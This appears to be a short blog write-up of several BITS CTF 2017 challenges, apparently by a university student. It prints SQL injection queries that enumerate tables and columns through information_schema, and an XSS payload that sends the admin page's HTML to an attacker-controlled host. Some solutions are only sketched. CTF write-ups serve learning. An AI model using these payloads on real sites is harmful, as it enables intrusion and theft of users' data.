BITS CTF 2017 WriteUp

I participated BITS CTF a little.
I solved this problems


  • [10] BotBot
  • [30] Batman vs Joker
  • [60] Message to the Admin


  • [60] Sherlock


  • [20] Command_Line
  • [30] Random Game

[10] BotBot

Access to, and see source.

<!-- Nothing to see here. Maybe try looking up seo .txt -->

So, see robots.txt .

Useragent *
Disallow: /fl4g

flag is in /fl4g.


[30] Batman vs Joker

You’ll find SQLi.

' order by 2; -- # is ok,
' order by 3; -- # is bad.
So there are 2 columns.

With this query, you can get All table names. And Joker table will be there.
' union select 'A',concat(table_name, ',') from information_schema.tables; -- #

Next, Let’s get a column name of Joker

'union select 'A', column_name from information_schema.columns where table_name = 'Joker'; -- #

There are Flag, HaHaHa.
And flag is there.


[60] Message to the Admin

Send this payload.
"><script>document.location.href='http://<yours>/?'+document.body.innerHTML </script>
And you’ll get flag with HTML body.


[60] Sherlock

Just do it.
Parse with this script.


[20] Command_Line

A x64 binary is given.
Just do it.


[30] Random Game

A x64 binary is given.
Win a 30 times in number game. seed is a value of time(), and we should answer 30 times correctly.
The value we should answer generates with rand() & 15.

The flag is :

投稿者: ytn

A student of University of Tsukuba.


メールアドレスが公開されることはありません。 * が付いている欄は必須項目です